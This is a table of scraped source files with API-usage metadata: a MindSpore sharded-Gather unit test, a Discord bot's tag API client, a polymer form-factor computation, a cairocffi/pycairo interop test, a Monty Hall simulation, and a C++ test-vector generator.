repo_name | repo_path | repo_head_hexsha | content | apis
---|---|---|---|---|
PowerOlive/mindspore | tests/ut/python/parallel/test_manual_gatherv2.py | bda20724a94113cedd12c3ed9083141012da1f15 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore as ms
from mindspore import context, Tensor, Parameter
from mindspore.common.api import _cell_graph_executor
from mindspore.nn import Cell, TrainOneStepCell, Momentum
from mindspore.ops import operations as P
from mindspore.common.initializer import initializer
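# Net chains a manually split Gather over a sharded parameter with Mul,
# Reshape and a reduce-scattered MatMul; the tests below compile it under
# various shard strategies and expect RuntimeError for the invalid ones.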
class Net(Cell):
def __init__(self,
strategy1=None,
strategy2=None,
strategy3=None,
axis=0,
init_flag=True,
split_tuple=(4, 4),
split_string="manual_split",
param_shape=(8, 8)):
super().__init__()
self.gatherv2 = P.Gather().shard(strategy1)
self.gatherv2.add_prim_attr(split_string, split_tuple)
self.mul = P.Mul().shard(strategy2)
self.reshape = P.Reshape()
self.matmul = P.MatMul().shard(strategy3)
self.matmul.add_prim_attr("forward_reduce_scatter", True)
if init_flag:
self.param = Parameter(initializer("ones", param_shape, ms.float32), name="gatherv2_param")
else:
self.param = Parameter(Tensor(np.ones(param_shape), dtype=ms.float32), name="gatherv2_param")
self.mul_weight = Parameter(initializer("ones", (8, 8, 8), ms.float32), name="mul_weight")
self.matmul_weight = Parameter(initializer("ones", (64, 16), ms.float32), name="matmul_weight")
self.axis = axis
def construct(self, x, b):
out = self.gatherv2(self.param, x, self.axis)
out = self.mul(out, self.mul_weight)
out = self.reshape(out, (8, 64))
out = self.matmul(out, self.matmul_weight)
return out
_x = Tensor(np.ones([8, 8]), dtype=ms.int32)
_b = Tensor(np.ones([64, 8]), dtype=ms.float32)
def compile_net(net):
optimizer = Momentum(net.trainable_params(), learning_rate=0.1, momentum=0.9)
train_net = TrainOneStepCell(net, optimizer)
train_net.set_auto_parallel()
train_net.set_train()
_cell_graph_executor.compile(train_net, _x, _b, auto_parallel_mode=True)
context.reset_auto_parallel_context()
def test_normal_split():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
compile_net(net)
def test_normal_split2():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=4, global_rank=0)
strategy1 = ((4, 1), (1, 4))
strategy2 = ((1, 4, 1), (1, 4, 1))
strategy3 = ((1, 4), (4, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=(10, 20, 30, 4), param_shape=(64, 8))
compile_net(net)
def test_normal_split3():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=32, global_rank=17)
strategy1 = ((4, 8), (1, 4))
strategy2 = ((1, 4, 8), (1, 4, 8))
strategy3 = ((1, 32), (32, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=(10, 20, 30, 4), param_shape=(64, 8))
compile_net(net)
def test_normal_split_with_offset():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, split_string="manual_split_with_offset", split_tuple=((4, 0), (4, 4)))
compile_net(net)
def test_auto_parallel_error():
context.set_auto_parallel_context(parallel_mode="auto_parallel", device_num=2, global_rank=0)
net = Net()
with pytest.raises(RuntimeError):
compile_net(net)
def test_axis_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, axis=1)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((4, 1), (8, 1))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error2():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((4, 1), (1, 8))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error3():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error4():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 8), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error5():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=4, global_rank=0)
strategy1 = ((4, 1), (1, 4))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_split_tuple_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=((5, 0), (5, 5)))
with pytest.raises(RuntimeError):
compile_net(net)
def test_parameter_use_tensor_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, init_flag=False)
with pytest.raises(RuntimeError):
compile_net(net)
| [((58, 12, 58, 27), 'numpy.ones', 'np.ones', ({(58, 20, 58, 26): '[8, 8]'}, {}), '([8, 8])', True, 'import numpy as np\n'), ((59, 12, 59, 28), 'numpy.ones', 'np.ones', ({(59, 20, 59, 27): '[64, 8]'}, {}), '([64, 8])', True, 'import numpy as np\n'), ((64, 16, 64, 48), 'mindspore.nn.TrainOneStepCell', 'TrainOneStepCell', ({(64, 33, 64, 36): 'net', (64, 38, 64, 47): 'optimizer'}, {}), '(net, optimizer)', False, 'from mindspore.nn import Cell, TrainOneStepCell, Momentum\n'), ((67, 4, 67, 76), 'mindspore.common.api._cell_graph_executor.compile', '_cell_graph_executor.compile', (), '', False, 'from mindspore.common.api import _cell_graph_executor\n'), ((68, 4, 68, 41), 'mindspore.context.reset_auto_parallel_context', 'context.reset_auto_parallel_context', ({}, {}), '()', False, 'from mindspore import context, Tensor, Parameter\n'), ((72, 4, 72, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((81, 4, 81, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((90, 4, 90, 104), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((99, 4, 99, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((108, 4, 108, 97), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((115, 4, 115, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((125, 4, 125, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((135, 4, 135, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((145, 4, 145, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((155, 4, 155, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((165, 4, 165, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((175, 4, 175, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((185, 4, 185, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((39, 23, 39, 34), 'mindspore.ops.operations.Reshape', 'P.Reshape', ({}, {}), '()', True, 'from mindspore.ops import operations as P\n'), ((110, 9, 110, 36), 'pytest.raises', 'pytest.raises', ({(110, 23, 110, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((120, 9, 120, 36), 'pytest.raises', 'pytest.raises', ({(120, 23, 120, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((130, 9, 130, 36), 
'pytest.raises', 'pytest.raises', ({(130, 23, 130, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((140, 9, 140, 36), 'pytest.raises', 'pytest.raises', ({(140, 23, 140, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((150, 9, 150, 36), 'pytest.raises', 'pytest.raises', ({(150, 23, 150, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((160, 9, 160, 36), 'pytest.raises', 'pytest.raises', ({(160, 23, 160, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((170, 9, 170, 36), 'pytest.raises', 'pytest.raises', ({(170, 23, 170, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((180, 9, 180, 36), 'pytest.raises', 'pytest.raises', ({(180, 23, 180, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((190, 9, 190, 36), 'pytest.raises', 'pytest.raises', ({(190, 23, 190, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((46, 36, 46, 78), 'mindspore.common.initializer.initializer', 'initializer', ({(46, 48, 46, 54): '"""ones"""', (46, 56, 46, 65): '(8, 8, 8)', (46, 67, 46, 77): 'ms.float32'}, {}), "('ones', (8, 8, 8), ms.float32)", False, 'from mindspore.common.initializer import initializer\n'), ((47, 39, 47, 80), 'mindspore.common.initializer.initializer', 'initializer', ({(47, 51, 47, 57): '"""ones"""', (47, 59, 47, 67): '(64, 16)', (47, 69, 47, 79): 'ms.float32'}, {}), "('ones', (64, 16), ms.float32)", False, 'from mindspore.common.initializer import initializer\n'), ((36, 24, 36, 34), 'mindspore.ops.operations.Gather', 'P.Gather', ({}, {}), '()', True, 'from mindspore.ops import operations as P\n'), ((38, 19, 38, 26), 'mindspore.ops.operations.Mul', 'P.Mul', ({}, {}), '()', True, 'from mindspore.ops import operations as P\n'), ((40, 22, 40, 32), 'mindspore.ops.operations.MatMul', 'P.MatMul', ({}, {}), '()', True, 'from mindspore.ops import operations as P\n'), ((43, 35, 43, 79), 'mindspore.common.initializer.initializer', 'initializer', ({(43, 47, 43, 53): '"""ones"""', (43, 55, 43, 66): 'param_shape', (43, 68, 43, 78): 'ms.float32'}, {}), "('ones', param_shape, ms.float32)", False, 'from mindspore.common.initializer import initializer\n'), ((45, 42, 45, 62), 'numpy.ones', 'np.ones', ({(45, 50, 45, 61): 'param_shape'}, {}), '(param_shape)', True, 'import numpy as np\n')] |
makayla-moster/ClemBot | ClemBot.Bot/bot/api/tag_route.py | 26503d25f1fbe2abcf99dbf0f68b17e88ad11a7c | from bot.api.api_client import ApiClient
from bot.api.base_route import BaseRoute
import typing as t
from bot.models import Tag
class TagRoute(BaseRoute):
def __init__(self, api_client: ApiClient):
super().__init__(api_client)
async def create_tag(self, name: str, content: str, guild_id: int, user_id: int, **kwargs) -> t.Optional[Tag]:
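        """
        Makes a call to the API to create a tag with the given name, content,
        guild id and user id. Returns the created Tag, or None on failure.
        """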
json = {
'Name': name,
'Content': content,
'GuildId': guild_id,
'UserId': user_id,
}
tag_dict = await self._client.post('tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def edit_tag_content(self, guild_id: int, name: str, content: str, **kwargs) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
'Content': content
}
tag_dict = await self._client.patch('bot/tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def edit_tag_owner(self, guild_id: int, name: str, user_id: int, **kwargs) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
'UserId': user_id
}
tag_dict = await self._client.patch('bot/tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def get_tag(self, guild_id: int, name: str) -> t.Optional[Tag]:
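        """
        Makes a call to the API to fetch the tag with the given GuildId and Name.
        Returns the Tag, or None if it does not exist.
        """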
json = {
'GuildId': guild_id,
'Name': name,
}
tag_dict = await self._client.get('bot/tags', data=json)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def get_tag_content(self, guild_id: int, name: str) -> t.Optional[str]:
json = {
'GuildId': guild_id,
'Name': name,
}
resp = await self._client.get('bot/tags', data=json)
return None if resp is None else resp['content']
async def delete_tag(self, guild_id: int, name: str, **kwargs):
"""
Makes a call to the API to delete a tag w/ the given GuildId and Name.
        If successful, the API will return a dict with the following values:
- name The name of the tag.
- content The content of the tag.
- guildId The guild id the tag was in.
"""
json = {
'GuildId': guild_id,
'Name': name,
}
return await self._client.delete('bot/tags', data=json, **kwargs)
async def add_tag_use(self, guild_id: int, name: str, channel_id: int, user_id: int):
"""
        Makes a call to the API to record that the tag w/ the given Name was used.
        If successful, the API will return a dict with the following values:
- name The name of the tag.
- guildId The guild id the tag is in.
"""
json = {
'GuildId': guild_id,
'Name': name,
'ChannelId': channel_id,
'UserId': user_id
}
return await self._client.post('bot/tags/invoke', data=json)
async def get_guilds_tags(self, guild_id: int) -> t.Iterator[Tag]:
resp = await self._client.get(f'guilds/{guild_id}/tags')
if not resp:
return []
return [Tag.from_dict(i) for i in resp['tags']]
| [((23, 15, 23, 38), 'bot.models.Tag.from_dict', 'Tag.from_dict', ({(23, 29, 23, 37): 'tag_dict'}, {}), '(tag_dict)', False, 'from bot.models import Tag\n'), ((34, 15, 34, 38), 'bot.models.Tag.from_dict', 'Tag.from_dict', ({(34, 29, 34, 37): 'tag_dict'}, {}), '(tag_dict)', False, 'from bot.models import Tag\n'), ((45, 15, 45, 38), 'bot.models.Tag.from_dict', 'Tag.from_dict', ({(45, 29, 45, 37): 'tag_dict'}, {}), '(tag_dict)', False, 'from bot.models import Tag\n'), ((55, 15, 55, 38), 'bot.models.Tag.from_dict', 'Tag.from_dict', ({(55, 29, 55, 37): 'tag_dict'}, {}), '(tag_dict)', False, 'from bot.models import Tag\n'), ((101, 16, 101, 32), 'bot.models.Tag.from_dict', 'Tag.from_dict', ({(101, 30, 101, 31): 'i'}, {}), '(i)', False, 'from bot.models import Tag\n')] |
kirichoi/PolymerConnectome | formfactor_AL.py | 064df932cfca57a97e62dfa9a32d1fa976500906 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 7 10:59:00 2020
@author: user
"""
import numpy as np
import multiprocessing as mp
import matplotlib.pyplot as plt
import time
import itertools
import ctypes
def formfactor(args):
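    # args = (q index, point index): for wave number q = logspace(-2, 3, 100)[args[0]],
    # sum cos(q.r) over the displacement vectors r between point args[1] and
    # every later point, averaged over probes along the x, y and z axes as an
    # approximation to the full orientational average.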
# with AL_dist_flat_glo.get_lock:
AL_dist_flat_glo_r = np.frombuffer(AL_dist_flat_glo.get_obj())
AL_dist_flat_glo_s = AL_dist_flat_glo_r.reshape((n_glo.value,m_glo.value))
# ffq = np.sum(np.cos(np.dot(np.logspace(-2,3,100)[args[0]]*np.array([1,0,0]),
# np.subtract(AL_dist_flat_glo_s[args[1]], AL_dist_flat_glo_s[1+args[1]:]).T)))
qr = np.logspace(-2,3,100)[args[0]]
rvec = np.subtract(AL_dist_flat_glo_s[args[1]], AL_dist_flat_glo_s[1+args[1]:]).T
cosx = np.cos(np.dot(qr*np.array([1,0,0]), rvec))
cosy = np.cos(np.dot(qr*np.array([0,1,0]), rvec))
cosz = np.cos(np.dot(qr*np.array([0,0,1]), rvec))
# cosxy = np.cos(np.dot(qr*np.array([0.707,0.707,0]), rvec))
# cosyz = np.cos(np.dot(qr*np.array([0,0.707,0.707]), rvec))
# cosxz = np.cos(np.dot(qr*np.array([0.707,0,0.707]), rvec))
# cosxyz = np.cos(np.dot(qr*np.array([0.577,0.577,0.577]), rvec))
ffq = np.sum(np.mean(np.array([cosx, cosy, cosz]), axis=0))
return ffq
def parallelinit(AL_dist_flat_glo_, n_glo_, m_glo_):
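    # Pool initializer: stash the shared-memory coordinate array and its
    # dimensions as globals in each worker so they are not re-pickled per task.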
global AL_dist_flat_glo, n_glo, m_glo
AL_dist_flat_glo = AL_dist_flat_glo_
n_glo = n_glo_
m_glo = m_glo_
if __name__ == '__main__':
AL_dist_flat = np.load(r'./AL_dist_flat.npy')
n = np.shape(AL_dist_flat)[0]
m = np.shape(AL_dist_flat)[1]
q_range = np.logspace(-2,3,100)
# r_x = np.array([1, 0, 0])
# q_range_glo = mp.Array(ctypes.c_double, q_range)
AL_dist_flat_glo = mp.Array(ctypes.c_double, AL_dist_flat.flatten())
n_glo = mp.Value(ctypes.c_int, n)
m_glo = mp.Value(ctypes.c_int, m)
# r_x_glo = mp.Array(ctypes.c_double, r_x)
paramlist = list(itertools.product(range(100), range(n)))
pool = mp.Pool(20, initializer=parallelinit, initargs=(AL_dist_flat_glo, n_glo, m_glo))
t1 = time.time()
results = pool.map(formfactor, paramlist)
pool.close()
t2 = time.time()
print(t2-t1)
np.save(r'./AL_results.npy', results)
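    # Collapse the per-(q, i) pair sums into P(q): the factor 2 restores the
    # double sum over ordered pairs (each i < j pair was counted once), and
    # dividing by n gives a per-point normalization.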
Pq = 2*np.divide(np.sum(np.array(results).reshape(100, n), axis=1), n)
# fig = plt.figure(figsize=(8,6))
# plt.plot(q_range, Pq, lw=3, color='tab:orange')
# plt.xscale('log')
# plt.xlabel('$q$', fontsize=15)
# plt.ylabel('$P(q)$', fontsize=15)
# plt.tight_layout()
# plt.savefig(r'./AL_form_factor.pdf', dpi=300, bbox_inches='tight')
# plt.show()
fig = plt.figure(figsize=(8,6))
plt.plot(q_range, Pq, lw=3, color='tab:orange')
plt.xscale('log')
plt.yscale('log')
plt.xlabel('$q$', fontsize=15)
plt.ylabel('$P(q)$', fontsize=15)
plt.tight_layout()
plt.savefig(r'./AL_form_factor_log.pdf', dpi=300, bbox_inches='tight')
plt.show()
| [((40, 19, 40, 49), 'numpy.load', 'np.load', ({(40, 27, 40, 48): '"""./AL_dist_flat.npy"""'}, {}), "('./AL_dist_flat.npy')", True, 'import numpy as np\n'), ((44, 14, 44, 35), 'numpy.logspace', 'np.logspace', ({(44, 26, 44, 28): '-2', (44, 29, 44, 30): '3', (44, 31, 44, 34): '100'}, {}), '(-2, 3, 100)', True, 'import numpy as np\n'), ((49, 12, 49, 37), 'multiprocessing.Value', 'mp.Value', ({(49, 21, 49, 33): 'ctypes.c_int', (49, 35, 49, 36): 'n'}, {}), '(ctypes.c_int, n)', True, 'import multiprocessing as mp\n'), ((50, 12, 50, 37), 'multiprocessing.Value', 'mp.Value', ({(50, 21, 50, 33): 'ctypes.c_int', (50, 35, 50, 36): 'm'}, {}), '(ctypes.c_int, m)', True, 'import multiprocessing as mp\n'), ((55, 11, 55, 91), 'multiprocessing.Pool', 'mp.Pool', (), '', True, 'import multiprocessing as mp\n'), ((57, 9, 57, 20), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((62, 9, 62, 20), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((66, 4, 66, 41), 'numpy.save', 'np.save', ({(66, 12, 66, 31): '"""./AL_results.npy"""', (66, 33, 66, 40): 'results'}, {}), "('./AL_results.npy', results)", True, 'import numpy as np\n'), ((79, 10, 79, 35), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((80, 4, 80, 51), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((81, 4, 81, 21), 'matplotlib.pyplot.xscale', 'plt.xscale', ({(81, 15, 81, 20): '"""log"""'}, {}), "('log')", True, 'import matplotlib.pyplot as plt\n'), ((82, 4, 82, 21), 'matplotlib.pyplot.yscale', 'plt.yscale', ({(82, 15, 82, 20): '"""log"""'}, {}), "('log')", True, 'import matplotlib.pyplot as plt\n'), ((83, 4, 83, 34), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (), '', True, 'import matplotlib.pyplot as plt\n'), ((84, 4, 84, 37), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (), '', True, 'import matplotlib.pyplot as plt\n'), ((85, 4, 85, 22), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((86, 4, 86, 74), 'matplotlib.pyplot.savefig', 'plt.savefig', (), '', True, 'import matplotlib.pyplot as plt\n'), ((87, 4, 87, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((21, 9, 21, 30), 'numpy.logspace', 'np.logspace', ({(21, 21, 21, 23): '(-2)', (21, 24, 21, 25): '(3)', (21, 26, 21, 29): '(100)'}, {}), '(-2, 3, 100)', True, 'import numpy as np\n'), ((22, 11, 22, 83), 'numpy.subtract', 'np.subtract', ({(22, 23, 22, 50): 'AL_dist_flat_glo_s[args[1]]', (22, 52, 22, 82): 'AL_dist_flat_glo_s[1 + args[1]:]'}, {}), '(AL_dist_flat_glo_s[args[1]], AL_dist_flat_glo_s[1 + args[1]:])', True, 'import numpy as np\n'), ((42, 8, 42, 30), 'numpy.shape', 'np.shape', ({(42, 17, 42, 29): 'AL_dist_flat'}, {}), '(AL_dist_flat)', True, 'import numpy as np\n'), ((43, 8, 43, 30), 'numpy.shape', 'np.shape', ({(43, 17, 43, 29): 'AL_dist_flat'}, {}), '(AL_dist_flat)', True, 'import numpy as np\n'), ((30, 25, 30, 53), 'numpy.array', 'np.array', ({(30, 34, 30, 52): '[cosx, cosy, cosz]'}, {}), '([cosx, cosy, cosz])', True, 'import numpy as np\n'), ((23, 28, 23, 45), 'numpy.array', 'np.array', ({(23, 37, 23, 44): '[1, 0, 0]'}, {}), '([1, 0, 0])', True, 'import numpy as np\n'), ((24, 28, 24, 45), 'numpy.array', 'np.array', ({(24, 37, 24, 44): '[0, 1, 0]'}, {}), '([0, 1, 0])', True, 'import numpy as np\n'), ((25, 28, 25, 45), 'numpy.array', 'np.array', ({(25, 37, 25, 44): '[0, 0, 1]'}, {}), '([0, 0, 1])', True, 'import numpy as np\n'), ((68, 28, 68, 
45), 'numpy.array', 'np.array', ({(68, 37, 68, 44): 'results'}, {}), '(results)', True, 'import numpy as np\n')] |
nanodude/cairocffi | utils/tests.py | 9d6a9a420a91da80f7901ace9945fd864f5d04dc | # coding: utf-8
import io
import cairo # pycairo
import cairocffi
from pycairo_to_cairocffi import _UNSAFE_pycairo_context_to_cairocffi
from cairocffi_to_pycairo import _UNSAFE_cairocffi_context_to_pycairo
import pango_example
def test():
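    # Round-trip a context from cairocffi to pycairo and back, then check that
    # all three handles report the same scale matrix and share the C pointer.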
cairocffi_context = cairocffi.Context(cairocffi.PDFSurface(None, 10, 20))
cairocffi_context.scale(2, 3)
pycairo_context = _UNSAFE_cairocffi_context_to_pycairo(cairocffi_context)
cairocffi_context2 = _UNSAFE_pycairo_context_to_cairocffi(pycairo_context)
assert tuple(cairocffi_context.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert tuple(cairocffi_context2.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert tuple(pycairo_context.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert cairocffi_context2._pointer == cairocffi_context._pointer
file_obj = io.BytesIO()
# Mostly test that this runs without raising.
pango_example.write_example_pdf(file_obj)
assert file_obj.getvalue().startswith(b'%PDF')
if __name__ == '__main__':
test()
| [((15, 22, 15, 77), 'cairocffi_to_pycairo._UNSAFE_cairocffi_context_to_pycairo', '_UNSAFE_cairocffi_context_to_pycairo', ({(15, 59, 15, 76): 'cairocffi_context'}, {}), '(cairocffi_context)', False, 'from cairocffi_to_pycairo import _UNSAFE_cairocffi_context_to_pycairo\n'), ((16, 25, 16, 78), 'pycairo_to_cairocffi._UNSAFE_pycairo_context_to_cairocffi', '_UNSAFE_pycairo_context_to_cairocffi', ({(16, 62, 16, 77): 'pycairo_context'}, {}), '(pycairo_context)', False, 'from pycairo_to_cairocffi import _UNSAFE_pycairo_context_to_cairocffi\n'), ((22, 15, 22, 27), 'io.BytesIO', 'io.BytesIO', ({}, {}), '()', False, 'import io\n'), ((24, 4, 24, 45), 'pango_example.write_example_pdf', 'pango_example.write_example_pdf', ({(24, 36, 24, 44): 'file_obj'}, {}), '(file_obj)', False, 'import pango_example\n'), ((13, 42, 13, 76), 'cairocffi.PDFSurface', 'cairocffi.PDFSurface', ({(13, 63, 13, 67): 'None', (13, 69, 13, 71): '10', (13, 73, 13, 75): '20'}, {}), '(None, 10, 20)', False, 'import cairocffi\n')] |
robertlit/monty-hall-problem | riddle.py | 746cab513dacdc1f47ce7269db35167df3520865 | import random
goat1 = random.randint(1, 3)
goat2 = random.randint(1, 3)
while goat1 == goat2:
goat2 = random.randint(1, 3)
success = 0
tries = 1_000_000
for _ in range(tries):
options = [1, 2, 3]
choice = random.randint(1, 3)
options.remove(choice)
if choice == goat1:
options.remove(goat2)
else:
options.remove(goat1)
choice = options[0]
if choice != goat1 and choice != goat2:
success = success + 1
print(success / tries)
| [((3, 8, 3, 28), 'random.randint', 'random.randint', ({(3, 23, 3, 24): '1', (3, 26, 3, 27): '3'}, {}), '(1, 3)', False, 'import random\n'), ((4, 8, 4, 28), 'random.randint', 'random.randint', ({(4, 23, 4, 24): '1', (4, 26, 4, 27): '3'}, {}), '(1, 3)', False, 'import random\n'), ((7, 12, 7, 32), 'random.randint', 'random.randint', ({(7, 27, 7, 28): '1', (7, 30, 7, 31): '3'}, {}), '(1, 3)', False, 'import random\n'), ((14, 13, 14, 33), 'random.randint', 'random.randint', ({(14, 28, 14, 29): '1', (14, 31, 14, 32): '3'}, {}), '(1, 3)', False, 'import random\n')] |
selavy/studies | gentable/gen_test_cases.py | e17b91ffab193e46fec00cf2b8070dbf1f2c39e3 | #!/usr/bin/env python3
import random
N = 32
M = 64
# NOTE: 0 is a reserved value
randu = lambda x: random.randint(1, 2**x-1)
randU32 = lambda: randu(32)
randU64 = lambda: randu(64)
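# randu(x) draws a uniformly random nonzero x-bit value (0 is reserved above).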
fmt_by_dtype = {
'u32hex': '0x{:08x}',
'u64hex': '0x{:016x}',
}
cpp_by_dtype = {
'u32hex': 'uint32_t',
'u64hex': 'uint64_t',
}
# key = randU32()
# vals = [(key, randU32(), randU64()) for _ in range(N)]
# keys = [(x[0], x[1]) for x in vals]
# success = [random.choice(vals) for _ in range(M)]
# failure = []
keys = [(randU32(),) for _ in range(M)]
vals = [(randU32(), randU64()) for _ in range(N)]
def genval():
y = randU32()
    # vals holds (u32, u64) tuples, so the original `y in vals` test could
    # never match a bare int; compare against the key field of each tuple so
    # the miss keys are guaranteed absent.
    while any(y == v[0] for v in vals):
        y = randU32()
return y
miss = [(genval(),) for _ in range(M)]
def print_vector(vals, name, dtypes, indent=0):
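    # Emit a C++ `const std::vector<...>` initializer for the given rows: a
    # single dtype prints bare values, while multiple dtypes produce a
    # std::tuple<...> element type with brace-wrapped rows.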
indent = ' ' * indent
tabs = indent + ' '
cpptypes = [cpp_by_dtype[dt] for dt in dtypes]
if len(cpptypes) == 1:
cctype = cpptypes[0]
def fmtrow(vs): return vs
else:
cctype = f"std::tuple<{', '.join(cpptypes)}>"
def fmtrow(vs): return f"{{ {vs} }}"
fmts = [fmt_by_dtype[dt] for dt in dtypes]
print(f"{indent}const std::vector<{cctype}> {name} = {{")
rows = [
tabs + fmtrow(', '.join([fmt.format(v) for v, fmt in zip(vs, fmts)])) + ','
for vs in vals
]
print("\n".join(rows))
print(f"{indent}}};")
print('TEST_CASE("Insert random values and look them up", "[gentbl]")')
print('{')
print_vector(keys, name='keys', dtypes=['u32hex'], indent=4)
print()
print_vector(vals, name='vals', dtypes=['u32hex', 'u64hex'], indent=4)
print()
print_vector(miss, name='miss', dtypes=['u32hex'], indent=4)
print()
